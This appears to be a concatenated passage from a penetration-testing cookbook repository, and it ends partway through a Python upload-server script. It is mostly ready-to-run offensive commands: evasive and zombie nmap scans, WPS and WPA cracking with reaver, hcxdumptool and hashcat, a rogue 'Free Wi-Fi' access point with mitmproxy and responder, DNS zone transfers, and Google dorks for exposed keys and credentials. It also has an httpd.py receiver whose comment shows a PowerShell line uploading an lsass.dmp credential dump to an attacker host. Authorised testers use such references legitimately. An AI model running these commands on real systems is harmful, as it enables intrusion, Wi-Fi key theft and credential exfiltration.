approach, assume all hosts are up ($VAR_TARGET_HOSTS is "verified" already) 63 | ~$ nmap -Pn -n -v --top-ports 300 -iL $VAR_TARGET_HOSTS -oA $VAR_FILENAME-ports-top-300 64 | 65 | -- Another run, this time with a SYN scan 66 | ~$ nmap -sS -Pn -n -v --top-ports 300 -iL $VAR_TARGET_HOSTS -oA $VAR_FILENAME-ports-top-300-syn 67 | 68 | `` With host discovery disabled (-Pn), nmap is very likely to stall on large scans; custom probes can be used instead (only when not using $VAR_TARGET_HOSTS): 69 | 70 | ~$ nmap -n -v --top-ports 300 -PE -PP -PM -PS110,111,113,137,138,139,143,1433,1723,161,162,20,21,22,2001,2020,2222,23,2525,27017,3306,3389,389,4443,445,5020,5432,5061,587,5900,5901,636,6379,843,88,8000,8022,8080,8443,8888,993,995 -PU53,161,162,69,111,123,500 -iL $VAR_TARGET_CIDR -oA $VAR_FILENAME-ports-top-300-probes 71 | 72 | `` More intense, full port range 73 | 74 | -- In case the network might be monitored, light versioning, medium speed 75 | ~$ nmap -Pn -n -v -p- -sV --version-light -T3 -iL $VAR_TARGET_HOSTS -oA $VAR_FILENAME-ports-all 76 | 77 | -- In case the network is not monitored, full service and OS discovery, higher speed 78 | ~$ nmap -Pn -n -v -p- -sV -O -T4 -iL $VAR_TARGET_HOSTS 79 | 80 | `` Stealthy 81 | 82 | `` Scanning a large network while trying to avoid detection, top ports, something between T3/T4, one host and probe at a time 83 | 84 | ~$ nmap -Pn -n -v --top-ports=800 --max-rtt-timeout=2000ms --min-rtt-timeout=300ms --initial-rtt-timeout=500ms --max-retries=2 --host-timeout=15m --max-parallelism=1 --max-hostgroup=1 -iL $VAR_TARGET_HOSTS 85 | 86 | `` Firewall bypassing 87 | 88 | ~$ nmap -T4 -sS -v -Pn -g 443 -n --top-ports 1500 -iL $VAR_TARGET_HOSTS 89 | 90 | `` Bypassing Windows IPsec filter 91 | 92 | ~$ nmap -sS -v -v -Pn -g 88 -O -A -p- -iL $VAR_TARGET_HOSTS 93 | 94 | `` Using zombies 95 | 96 | ~$ nmap -T2 --packet-trace -D RND,RND,RND,RND,RND,ME -Pn -v -sI VAR_ZOMBIE_HOST:443 --data-length -f --mtu 24 -iL $VAR_TARGET_HOSTS 97 | 98 | `` 
FTP bounce scanning 99 | 100 | ~$ nmap -b VAR_FTP_HOST -P0 -g 88 -n -v -sV -A --top-ports 500 -iL $VAR_TARGET_HOSTS 101 | 102 | `` Scanning over a SOCKS proxy 103 | 104 | ~$ proxychains -q nmap -sT -Pn -n -v $VAR_TARGET_CIDR 105 | 106 | `` PowerShell 107 | 108 | `` With simple range-based port scanning 109 | 110 | >$ 1..254 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.$a",$_)) "Port $_ is open!"} 2>$null} 111 | 112 | `` With simple list-based port scanning 113 | 114 | >$ 1..254 | % { $a = $_; write-host "------"; write-host "192.168.1.$a"; 22,53,80,445 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.$a",$_)) "Port $_ is open!"} 2>$null} 115 | 116 | `` TCP 117 | 118 | ~$ hping3 -S -8 1-65535 VAR_TARGET_HOST | grep -v 'Not responding' 119 | ~$ hping3 -S -c 3 -s 53 -p 80 VAR_TARGET_HOST 120 | ~$ proxychains -q nmap -T4 -Pn -sT -A -n -v --top-ports 2500 VAR_TARGET_HOST 121 | ~$ nc -vvn -w 1 -z VAR_TARGET_HOST 1-65535 122 | ~$ unicornscan -H -msf -Iv VAR_TARGET_HOST -p 1-65535 123 | 124 | `` UDP 125 | 126 | ~$ nmap -nv -sU -sV -Pn -p- --reason --stats-every 60s --max-rtt-timeout=150ms --max-retries=1 VAR_TARGET_HOST 127 | ~$ nc -nnvu -w 1 -z VAR_TARGET_HOST 1-65535 128 | ~$ unicornscan -H -mU -Iv VAR_TARGET_HOST -p 1-65535 129 | 130 | `` Fingerprinting 131 | 132 | ~$ amap -A VAR_TARGET_HOST VAR_TARGET_PORT 133 | ~$ nmap -A -sV -Pn -n -v VAR_TARGET_HOST -p VAR_TARGET_PORT 134 | ~$ nmap -A -sV -Pn -n -v --version-all VAR_TARGET_HOST -p VAR_TARGET_PORT 135 | 136 | `` Scripts 137 | 138 | `` PowerShell 139 | 140 | @ snippets/windows/utils/PortScanning.ps1 141 | 142 | `` Port knocking 143 | 144 | ~$ for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x VAR_TARGET_HOST; done 145 | 146 | `` Looking for information useful in further network penetration 147 | 148 | `` FTP 149 | 150 | ~$ nmap -PS21 --open -v -n -p21 --script ftp-anon -oA $VAR_FILENAME-tcp-21.txt $VAR_TARGET_CIDR 151 | 152 | `` NFS 
153 | 154 | ~$ nmap -PS2049 --open -v -n -p2049 -oA $VAR_FILENAME-tcp-2049.txt $VAR_TARGET_CIDR 155 | ~$ nmap -PU2049 --open -v -n -sU -p2049 -oA $VAR_FILENAME-udp-2049.txt $VAR_TARGET_CIDR 156 | 157 | `` TFTP 158 | 159 | ~$ nmap -PU69 --open -v -n -sU -p69 -oA $VAR_FILENAME-tcp-69.txt $VAR_TARGET_CIDR 160 | 161 | `` SMB 162 | 163 | ~$ nmap -PS445 --open -v -n -p445 -oA $VAR_FILENAME-tcp-445.txt $VAR_TARGET_CIDR 164 | ~$ nmap --script smb-enum-shares -p445 -v -n --open -oA $VAR_FILENAME-smb-shares.txt $VAR_TARGET_CIDR 165 | 166 | `` SNMP 167 | 168 | ~$ nmap -sU --open -p161 $VAR_TARGET_CIDR 169 | 170 | `` HTTP / NAS 171 | 172 | - Run HTTP discovery with `pukpuk`, search for keywords in responses. 173 | -------------------------------------------------------------------------------- /Target.Network.Wireless.txt: -------------------------------------------------------------------------------- 1 | `` Important notes 2 | 3 | - Remove `firmware-realtek` and use dkms 4 | - Use `pentesting-bootsrap/bootstrap.rtl88**au.sh` scripts to install kernel modules 5 | 6 | `` Defaults 7 | 8 | -- AP: 00:00:00:00:00:00 9 | -- Client: 00:00:00:00:00:01 10 | -- Wireless interface: wlan0 11 | 12 | `` Setting up 13 | 14 | ~# airmon-ng check kill 15 | ~# rfkill unblock all 16 | ~# ip link set $WLAN down 17 | ~# export WLAN=wlan0 18 | ~# export WLAN_TARGET_MAC=000000000000 19 | 20 | `` Attacks 21 | 22 | `` wifite2 23 | 24 | - Tested with wifite2 2.7.0 25 | 26 | `` Generic 27 | 28 | ~# wifite -i $WLAN -mac --showb 29 | 30 | `` PMKID 31 | 32 | ~# wifite -i $WLAN -mac --showb --pmkid 33 | 34 | `` WEP 35 | 36 | ~# wifite -i $WLAN -mac --showb --wep --keep-ivs 37 | 38 | `` WPS 39 | 40 | ~# wifite -i $WLAN -mac --showb --wps --wps-only 41 | 42 | `` wash / reaver (WPS) 43 | 44 | -- Identifying target 45 | ~# wash -i $WLAN 46 | 47 | -- Cracking 48 | ~# reaver -i $WLAN -b $WLAN_TARGET_MAC -c 11 -vv -K 49 | 50 | -- Retrieve passphrase using PIN 51 | ~# reaver -i $WLAN -b $WLAN_TARGET_MAC -s y -vv -p 
00000000 52 | 53 | `` hcxdumptool (WPA) 54 | 55 | - Tested with hcxdumptool 6.3.1 56 | - Compile hcxdumptool from sources! 57 | 58 | `` Setting up 59 | 60 | ~# export WLAN_MAC=`iw $WLAN info | grep addr | cut -d' ' -f2 -z` 61 | ~# hcxdumptool -m $WLAN 62 | 63 | `` Discovery 64 | 65 | -- 2.4Ghz and 5Ghz 66 | ~# hcxdumptool -i $WLAN -F --rcascan=p 67 | 68 | `` Selecting target 69 | 70 | ~# export WLAN_TARGET_FREQ=5640 71 | ~# export WLAN_TARGET_CH=7 72 | 73 | `` Creating filters 74 | 75 | `` Protect 76 | 77 | ~# tcpdump -i $WLAN not wlan addr2 $WLAN_MAC -ddd > protect.bpf 78 | 79 | `` Attack 80 | 81 | ~# tcpdump -i $WLAN wlan addr1 $WLAN_TARGET_MAC or wlan addr2 $WLAN_TARGET_MAC or wlan addr3 $WLAN_TARGET_MAC or wlan addr3 ff:ff:ff:ff:ff:ff -ddd > attack.bpf 82 | 83 | `` Execution 84 | 85 | ~# hcxdumptool -i $WLAN -c $WLAN_TARGET_CH -f $WLAN_TARGET_FREQ --bpf=attack.bpf -w output.pcapng 86 | ~$ hcxpcapngtool -o output.hc22000 output.pcapng 87 | ~$ hashcat -m 22000 output.hc22000 VAR_WORDLIST 88 | 89 | `` Helpers 90 | 91 | `` Random MAC address but matching device type 92 | 93 | ~# macchanger -a $WLAN 94 | 95 | `` Setting monitor mode 96 | 97 | ~# iw dev $WLAN set type monitor 98 | 99 | `` Verify settings 100 | 101 | ~# iw $WLAN info 102 | 103 | `` Test injection 104 | 105 | ~# aireplay-ng -9 $WLAN 106 | 107 | `` Discovery (changes channel) 108 | 109 | -- 2.4Ghz 110 | ~# airodump-ng $WLAN 111 | 112 | -- 5Ghz 113 | ~# airodump-ng $WLAN --band a 114 | 115 | `` Back to managed mode 116 | 117 | ~# iw dev $WLAN set type managed 118 | 119 | `` Restarting services 120 | 121 | ~# systemctl start wpa_supplicant.service 122 | ~# systemctl start NetworkManager.service 123 | 124 | `` Boosting tx power 125 | 126 | ~# iw $WLAN set txpower fixed 3000 127 | 128 | `` Setting channel 129 | 130 | ~# iw dev $WLAN set channel 11 131 | 132 | `` Setting custom MAC address 133 | 134 | ~# macchanger -m 00:00:00:00:00:01 $WLAN 135 | 136 | `` Check manufacturer based on MAC 137 | 138 | ~$ 
~/lib/pentesting-cookbook/bin/mac_oui.sh $WLAN_TARGET_MAC 139 | 140 | `` Convert pcap to Hashcat's hccapx format 141 | 142 | ~$ hcxpcapngtool -o out.hccapx out.pcap 143 | 144 | -- Write strings to `wordlist` in case the traffic contained clear-text passwords 145 | ~$ hcxpcapngtool -o out.hccapx -E wordlist out.pcap 146 | 147 | -- Verify output 148 | ~$ wlanhcxinfo -i out.hccapx 149 | 150 | `` Device model using Wireshark 151 | 152 | - Filter: (wps.device_name != "" || wps.model_name != "" || wps.model_number != "") 153 | - In Tag: Vendor [...] WPS 154 | - Manufacturer: TP-Link 155 | - Model Name: TL-WR841N 156 | - Device Name: Wireless N Router TL-WR841N 157 | 158 | `` Cracking 159 | 160 | -- Dictionary attack 161 | ~$ hashcat -m 22000 wpa.hc22000 VAR_WORDLIST 162 | 163 | -- Dictionary attack with combinations (hashcat rules) 164 | ~$ hashcat -m 22000 -r /usr/share/hashcat/rules/best64.rule wpa.hc22000 VAR_WORDLIST 165 | 166 | -- Bruteforce attack 167 | ~$ hashcat -m 22000 wpa.hc22000 -a 3 -O -w 3 -1 ?l?d ?1?1?1?1?1?1?1?1?1?1?1?1?1 168 | 169 | `` Scenarios 170 | 171 | `` Routing, injection and NTLM 172 | 173 | ~# route del default 174 | ~# route add default gw $_IP $WLAN 175 | ~# iptables -A INPUT -j LOG 176 | ~# echo 1 > /proc/sys/net/ipv4/ip_forward 177 | ~# iptables -F 178 | ~# iptables -t nat -F 179 | ~# iptables -t nat -A PREROUTING -i $WLAN -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8080 180 | ~# iptables -t nat -A POSTROUTING -o $WLAN -j MASQUERADE 181 | ~# mitmproxy --mode transparent -s $_FILE.py --listen-host $_IP 182 | ~# responder -I $WLAN -wF 183 | 184 | `` CLI configuration 185 | 186 | ~$ vim wireless.config 187 | ctrl_interface=/var/run/wpa_supplicant 188 | ctrl_interface_group=0 189 | update_config=1 190 | network={ 191 | ssid="VAR_STRING" 192 | psk="VAR_STRING" 193 | } 194 | ~# wpa_supplicant -D wext -i $WLAN -c wireless.config 195 | ~# dhclient $WLAN 196 | 197 | `` IPv6 AP 198 | 199 | ~# cat > /etc/radvd.conf << EOF 200 | interface 
br-wlan-ipv6 { 201 | AdvSendAdvert on; 202 | MinRtrAdvInterval 3; 203 | MaxRtrAdvInterval 10; 204 | prefix fd13:37::/32 { 205 | AdvOnLink on; 206 | AdvAutonomous on; 207 | AdvRouterAddr on; 208 | }; 209 | }; 210 | EOF 211 | ~$ cat > hostapd.conf << EOF 212 | interface=$WLAN 213 | bridge=br-wlan-ipv6 214 | hw_mode=g 215 | channel=10 216 | wmm_enabled=1 217 | ssid=Free Wi-Fi 218 | auth_algs=1 219 | wpa=2 220 | wpa_key_mgmt=WPA-PSK 221 | rsn_pairwise=CCMP 222 | wpa_passphrase=somepassword 223 | EOF 224 | ~# ip link set $WLAN down 225 | ~# macchanger -A $WLAN 226 | ~# ip link set $WLAN up 227 | ~# ip link add name br-wlan-ipv6 type bridge 228 | ~# ip address add fd13:37::1 dev br-wlan-ipv6 229 | ~# ip link set br-wlan-ipv6 up 230 | ~# hostapd ./hostapd.conf 231 | -------------------------------------------------------------------------------- /Target.Recon.DNS.txt: -------------------------------------------------------------------------------- 1 | `` DNS 2 | 3 | `` CNAME hijacking 4 | 5 | @ bin/dns_cnames.sh 6 | 7 | 8 | `` Zone transfer 9 | 10 | ~$ dig @ns.VAR_TARGET_DOMAIN VAR_TARGET_DOMAIN -t axfr 11 | ~$ host -t axfr -l VAR_TARGET_DOMAIN ns.VAR_TARGET_DOMAIN 12 | ~$ dnsrecon -d VAR_TARGET_DOMAIN -t axfr 13 | 14 | @ bin/dns_transfer.sh 15 | 16 | `` Lookup 17 | 18 | ~$ whois VAR_TARGET_DOMAIN 19 | ~$ dig +nocomments +noauthority +noadditional +nostats VAR_TARGET_DOMAIN -t any 20 | ~$ dig +noall +answer VAR_TARGET_DOMAIN -t any 21 | ~$ nslookup -type=any VAR_TARGET_DOMAIN 22 | 23 | `` Enumeration 24 | 25 | `` Active (wordlist based) 26 | 27 | ~$ dnsrecon -d VAR_TARGET_DOMAIN -D VAR_WORDLIST -t brt --threads 8 28 | ~$ fierce -dns VAR_TARGET_DOMAIN -wordlist VAR_WORDLIST 29 | 30 | -- Using list of root domain names 31 | ~$ amass enum -brute -df VAR_FILE -w ~/lib/brutas/brutas-subdomains-1-small.txt 32 | 33 | `` Active 34 | 35 | ~$ dnsrecon -d VAR_TARGET_DOMAIN -t std,rvl 36 | ~$ fierce -range VAR_ATTACKER_HOST-100 -dnsserver ns.VAR_TARGET_DOMAIN 37 | 38 | `` Active with 
passive sources 39 | 40 | ~$ amass enum -brute -d VAR_TARGET_DOMAIN -w VAR_WORDLIST 41 | ~$ sublist3r -d VAR_TARGET_DOMAIN -b -t 50 42 | 43 | `` Completely passive 44 | 45 | ~$ subfinder -d VAR_TARGET_DOMAIN 46 | 47 | `` With zone transfer 48 | 49 | ~$ dnsenum VAR_TARGET_DOMAIN --enum -f VAR_WORDLIST 50 | ~$ amass enum -src -brute -ip -min-for-recursive 2 -active -d VAR_TARGET_DOMAIN 51 | -------------------------------------------------------------------------------- /Target.Recon.Dorks.txt: -------------------------------------------------------------------------------- 1 | `` Google 2 | 3 | `` Notes 4 | 5 | For more narrow search replace "VAR_ORGANIZATION_STRING" with site:VAR_TARGET_HOST 6 | 7 | `` Generics 8 | 9 | "Directory Listing for" "VAR_ORGANIZATION_STRING" 10 | intitle:"Index of" "VAR_ORGANIZATION_STRING" 11 | 12 | `` Exposed services 13 | 14 | (site:*/admin OR site:*/signin OR site:*/login) "VAR_ORGANIZATION_STRING" 15 | ("password" OR "admin" OR "panel") (intitle:signin OR intitle:login OR intitle:panel) "VAR_ORGANIZATION_STRING" 16 | (allinurl:"/*/_vti_pvt/" OR allinurl:"/*/_vti_cnf/") "VAR_ORGANIZATION_STRING" 17 | intext:"Index of /.git" "VAR_ORGANIZATION_STRING" 18 | intext:"Index of /.svn" "VAR_ORGANIZATION_STRING" 19 | 20 | `` Configuration and backups 21 | 22 | (".xml" OR ".yml" OR ".yaml" OR ".json" OR ".sql" OR ".cfg" OR ".conf" OR ".cnf" OR ".config" OR ".inf" OR ".ini" OR ".cgi" OR ".bak" OR ".csv" OR ".dll" OR ".sys") intitle:"Index of" "VAR_ORGANIZATION_STRING" 23 | (".log" OR ".zip" OR ".7z" OR ".rar" OR ".tar" OR ".gz" OR ".mdb" OR ".pem" OR ".rdp" OR ".ovpn" OR ".kdbx" OR ".key") intitle:"Index of" "VAR_ORGANIZATION_STRING" 24 | 25 | `` Specific files 26 | 27 | `` Web applications 28 | 29 | ("web.config" OR "config.py" OR "settings.py" OR ".dockerignore" OR "wwwroot" OR "wp-config.php" OR "access_log" OR "error_log" OR ".htaccess" OR "WEB-INF" OR "accounts.xml") intitle:"Index of" "VAR_ORGANIZATION_STRING" 30 | intitle:"Index of" 
(".asp" OR ".rb" OR ".php" OR ".py" OR ".jsp" OR ".env") "VAR_ORGANIZATION_STRING" 31 | 32 | `` Credentials 33 | 34 | ("authorized_keys" OR "id_rsa") -"id_rsa.pub" intitle:"Index of" "VAR_ORGANIZATION_STRING" 35 | 36 | `` Home dirs 37 | 38 | (".zshrc" OR ".bashrc" OR "desktop.ini" OR "trash" OR "My Documents") intitle:"Index of" "VAR_ORGANIZATION_STRING" 39 | 40 | `` Content-based 41 | 42 | ("INSERT INTO" OR "PRIVATE KEY") "VAR_ORGANIZATION_STRING" 43 | 44 | `` Communications and documents 45 | 46 | (".ods" OR ".odt" OR ".doc" OR ".docx" OR ".pdf" OR ".xls" OR ".xlsx" OR ".ppt" OR ".pptx") "VAR_ORGANIZATION_STRING" 47 | (".eml" OR ".ica" OR ".mbx" OR ".wab" OR ".ost" OR ".pst" OR ".txt") "VAR_ORGANIZATION_STRING" 48 | -------------------------------------------------------------------------------- /Target.Recon.OSINT.txt: -------------------------------------------------------------------------------- 1 | `` OSINT 2 | 3 | `` Automated 4 | 5 | ~$ theharvester -d VAR_TARGET_DOMAIN -l 250 -b google,baidu,yahoo,bing,pgp 6 | ~$ amass intel -active -addr VAR_TARGET_RANGE -p 80,443,8080 7 | -------------------------------------------------------------------------------- /bin/direnum_combo.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 http://example.com" 5 | exit 1 6 | fi 7 | 8 | shopt -s extglob 9 | TARGET=${1%%+(/)} 10 | USERAGENT="User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43" 11 | echo "Checking... 
$TARGET" 12 | echo "Using $USERAGENT" 13 | 14 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-usernames.txt -H "$USERAGENT" -u $TARGET/~FUZZ 15 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt -H "$USERAGENT" -u $TARGET/FUZZ 16 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt -H "$USERAGENT" -u $TARGET/FUZZ/ 17 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt -H "$USERAGENT" -u $TARGET/.FUZZ 18 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt -H "$USERAGENT" -u $TARGET/.FUZZ/ 19 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt:PATH -w ~/lib/brutas/brutas-extensions.txt:EXT -H "$USERAGENT" -u $TARGET/PATHEXT 20 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt:PATH -w ~/lib/brutas/brutas-extensions.txt:EXT -H "$USERAGENT" -u $TARGET/.PATHEXT 21 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt -H "$USERAGENT" -u $TARGET/_FUZZ 22 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt -H "$USERAGENT" -u $TARGET/__FUZZ 23 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt:PATH -w ~/lib/brutas/brutas-extensions.txt:EXT -H "$USERAGENT" -u $TARGET/_PATHEXT 24 | ~/go/bin/ffuf -ac -w ~/lib/brutas/brutas-http-paths.txt:PATH -w ~/lib/brutas/brutas-extensions.txt:EXT -H "$USERAGENT" -u $TARGET/__PATHEXT -------------------------------------------------------------------------------- /bin/dns_cnames.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 domains.txt" 5 | exit 1 6 | fi 7 | 8 | for domain in $(cat "$1"); do 9 | result=$(dig +noall +answer $domain -t cname | cut -f6) 10 | if [[ -n $result ]]; then 11 | echo "$domain -> $result" 12 | fi 13 | done 14 | -------------------------------------------------------------------------------- /bin/dns_resolve.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 hosts.txt" 5 
| exit 1 6 | fi 7 | 8 | filter='has no|not found' 9 | 10 | for domain in $(cat "$1"); do 11 | host -t a $domain | grep -v -E "$filter" | sed 's/ has address /;/' 12 | host -t aaaa $domain | grep -v -E "$filter" | sed 's/ has IPv6 address /;/' 13 | done -------------------------------------------------------------------------------- /bin/dns_transfer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 example.com" 5 | exit 1 6 | fi 7 | 8 | for ns in $(dig +noall +answer $1 -t ns | cut -f5); do 9 | dig @$ns $1 -t axfr | sed 's/.$//' 10 | done 11 | -------------------------------------------------------------------------------- /bin/download_files.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 urls.txt" 5 | exit 1 6 | fi 7 | 8 | for url in $(cat "$1"); do 9 | echo "Requesting: $url" 10 | wget --content-disposition --no-check-certificate "$url" 11 | done -------------------------------------------------------------------------------- /bin/download_int.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 http://example.com/asset- " 5 | exit 1 6 | fi 7 | 8 | for ((int=$2; int<=$3; int++)); do 9 | echo "Requesting: $1$int" 10 | wget --content-disposition "$1$int" 11 | done -------------------------------------------------------------------------------- /bin/ftp_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | 5 | from pyftpdlib.authorizers import DummyAuthorizer 6 | from pyftpdlib.handlers import FTPHandler 7 | from pyftpdlib.servers import FTPServer 8 | 9 | 10 | if __name__ == '__main__': 11 | 12 | parser = argparse.ArgumentParser( 13 | description='Starts a simple FTP server', 14 | 
formatter_class=argparse.ArgumentDefaultsHelpFormatter 15 | ) 16 | parser.add_argument('-un', '--username', help='Expected username', default='user') 17 | parser.add_argument('-up', '--password', help='Expected password', default='pass') 18 | parser.add_argument('-lh', '--addr', help='Listening address', default='') 19 | parser.add_argument('-lp', '--port', help='Listening port', type=int, default=21) 20 | parser.add_argument('-p', '--path', help='Exposed local path', default='./') 21 | parser.add_argument('-b', '--banner', help='Exposed FTP banner', default='FTPd 1.99') 22 | args = parser.parse_args() 23 | 24 | authorizer = DummyAuthorizer() 25 | authorizer.add_user(args.username, args.password, args.path, perm='elradfmw') 26 | handler = FTPHandler 27 | handler.authorizer = authorizer 28 | handler.banner = args.banner 29 | handler.passive_ports = range(60000, 65535) 30 | address = (args.addr, args.port) 31 | server = FTPServer(address, handler) 32 | server.max_cons = 256 33 | server.max_cons_per_ip = 5 34 | server.serve_forever() 35 | -------------------------------------------------------------------------------- /bin/hexdecode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | 5 | 6 | if __name__ == '__main__': 7 | 8 | parser = argparse.ArgumentParser(description='Turns escaped hexadecimal value into decoded string') 9 | parser.add_argument('value', help='E.g. 
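\\x72\\x32\\x33\\x34')
    args = parser.parse_args()

    # The help text advertises "\x72\x32..." input, but previously only the
    # letter 'x' was stripped before bytearray.fromhex(), which then rejected
    # the remaining backslashes -- it only worked when an unquoted shell
    # argument had already eaten them. Strip escape prefixes and the usual
    # separators instead ("0x"-prefixed bytes are still not understood), and
    # turn the two predictable failures into argparse errors instead of
    # tracebacks.
    hex_digits = args.value.translate(str.maketrans('', '', '\\xX ,:'))
    if len(hex_digits) % 2:
        parser.error('odd number of hex digits in {!r}'.format(args.value))
    try:
        # iso-8859-1 maps every byte value, so the decode itself cannot fail.
        result = bytearray.fromhex(hex_digits).decode('iso-8859-1')
    except ValueError as exc:
        parser.error(str(exc))
    print(result)
--------------------------------------------------------------------------------
/bin/hexreverse.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

import argparse


if __name__ == '__main__':

    parser = argparse.ArgumentParser(description='Turns hexadecimal values into escaped and reversed string like \\x34\\x33\\x32\\x72')
    parser.add_argument('value', help='E.g. 72323334')
    args = parser.parse_args()

    # Byte order is reversed (little-endian style), not the digit order.
    result = bytearray.fromhex(args.value)
    result.reverse()
    print(''.join('\\x{:02x}'.format(b) for b in result))
--------------------------------------------------------------------------------
/bin/http_codes.sh:
--------------------------------------------------------------------------------
#!/bin/bash

if [[ -z $1 ]]; then
    echo "Usage: $0 urls.txt"
    exit 1
fi

for url in $(cat "$1"); do
    echo $url "->" $(curl -s -o /dev/null -w "\n%{http_code}\n" "${url}")
done
--------------------------------------------------------------------------------
/bin/httpd.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

import argparse
import cgi
import logging
import pathlib
import socket
import ssl
from datetime import datetime
from http import server


logging.basicConfig(format='%(name)s %(levelname)s [%(asctime)s] %(message)s', level=logging.INFO)
logger = logging.getLogger('httpd')


# Example usage:
# ~> powershell -exec bypass "(New-Object System.Net.WebClient).UploadFile('http://VAR_ATTACKER_HOST:8080/lsass.dmp', 'C:\Windows\Temp\lsass.dmp')"

# Generating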
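# server.pem:
# ~$ openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes


class FileHandler(server.BaseHTTPRequestHandler):
    """Serve files from, and save uploads into, the working directory.

    GET /name   -> streams ./name (or a file below cwd) as octet-stream.
    POST /name  -> stores the multipart field 'file' as ./name; without a
                  usable name, every field is stored under a generated name.

    The request path is chosen by the peer -- here that is the host we are
    pulling loot from, which may not be as friendly as assumed -- so every
    name is resolved before the containment test. The previous test,
    ``cwd in Path(cwd, name).parents`` on the unresolved path, was
    satisfied by ``/../../home/me/.ssh/authorized_keys`` because Path keeps
    ``..`` components lexically; open() then followed them out of cwd, for
    reads (GET) and writes (POST) alike.
    """

    def __init__(self, *args, **kwargs):
        # resolve() so a symlinked working directory compares equal to the
        # resolved candidate paths produced by local_path().
        self.cwd = pathlib.Path.cwd().resolve()
        super().__init__(*args, **kwargs)

    def send_headers(self, content_type='text/html'):
        """Send a 200 with *content_type* and ask the peer to close."""
        self.send_response(200)
        self.send_header('Content-type', content_type)
        self.send_header('Connection', 'close')
        self.end_headers()

    def get_temp_filename(self, client_host):
        """Build a not-yet-existing file name from *client_host* and a timestamp."""
        name_date = datetime.now().strftime('%Y%m%d_%H%M')
        name = client_host + '-' + name_date
        suffix = 0
        while pathlib.Path(name).exists():
            suffix += 1
            name = client_host + '-' + name_date + '-' + str(suffix)
        return name

    def get_path_filename(self):
        """Return the request path with its leading slash removed."""
        return self.path.partition('/')[-1]

    def get_client_address(self):
        """Return 'host:port' of the peer."""
        return ':'.join([str(i) for i in self.client_address])

    def local_path(self, file_name):
        """Map *file_name* to a path strictly below cwd, or None if it escapes.

        The candidate is resolved (``..`` collapsed, symlinks followed)
        before the containment check; an absolute *file_name* replaces cwd
        in the join and is therefore rejected as well.
        """
        candidate = pathlib.Path(self.cwd, file_name).resolve()
        if self.cwd not in candidate.parents:
            return None
        return candidate

    def do_GET(self):
        client_address = self.get_client_address()
        local_path = self.local_path(self.get_path_filename())
        if local_path is not None and local_path.is_file():
            self.send_headers('application/octet-stream')
            logger.info('Sending file {} to {}...'.format(local_path, client_address))
            with open(str(local_path), mode='rb') as fil:
                self.wfile.write(fil.read())
        else:
            # Unknown or disallowed path: empty 200, nothing for the caller
            # to learn from.
            self.send_headers()

    def do_POST(self):
        self.send_headers()
        client_address = self.get_client_address()
        # NOTE: the cgi module is deprecated and removed in Python 3.13;
        # the multipart parsing will need email.parser or similar there.
        form = cgi.FieldStorage(
            fp=self.rfile,
            headers=self.headers,
            environ={
                'REQUEST_METHOD': 'POST',
                'CONTENT_TYPE': self.headers['Content-Type'],
            }
        )
        file_name = self.get_path_filename()
        output = form.getvalue('file')
        if file_name and output:
            targets = [(file_name, output)]
        else:
            # No usable name in the URL: keep every field under a generated
            # name. Previously the loop only computed names and the single
            # write after it kept the last field; now each field is stored.
            # The field name is peer-controlled and goes through the same
            # containment check as the URL path.
            targets = [
                (self.get_temp_filename(client_address + '-' + key), form.getvalue(key))
                for key in form.keys()
            ]
        for name, data in targets:
            local_path = self.local_path(name)
            if local_path is None:
                logger.warning('Rejected path {!r} from {}'.format(name, client_address))
                continue
            if data is None:
                continue
            if isinstance(data, str):
                # Non-file form fields arrive decoded; the file is opened binary.
                data = data.encode('utf-8', errors='surrogateescape')
            logger.info('Saving file {} ({} bytes) from {}...'.format(local_path, self.headers['Content-Length'], client_address))
            with open(local_path, 'wb') as fil:
                fil.write(data)
            logger.info('Saved {}'.format(local_path))


class HTTPServerV6(server.HTTPServer):
    """HTTPServer bound to an IPv6 socket."""

    address_family = socket.AF_INET6


if __name__ == '__main__':

    parser = argparse.ArgumentParser(
        description='Saves files sent over HTTP POST to /path_is_filename.',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter
    )
    parser.add_argument('-i', '--addr', help='Listening address', default='')
    parser.add_argument('-p', '--port', help='Listening port', type=int, default=8080)
    parser.add_argument('-6', '--ipv6', help='Enable IPv6', action='store_true')
    parser.add_argument('-s', '--https', help='Enable HTTPS and use provided certificate', default=None)
    args = parser.parse_args()
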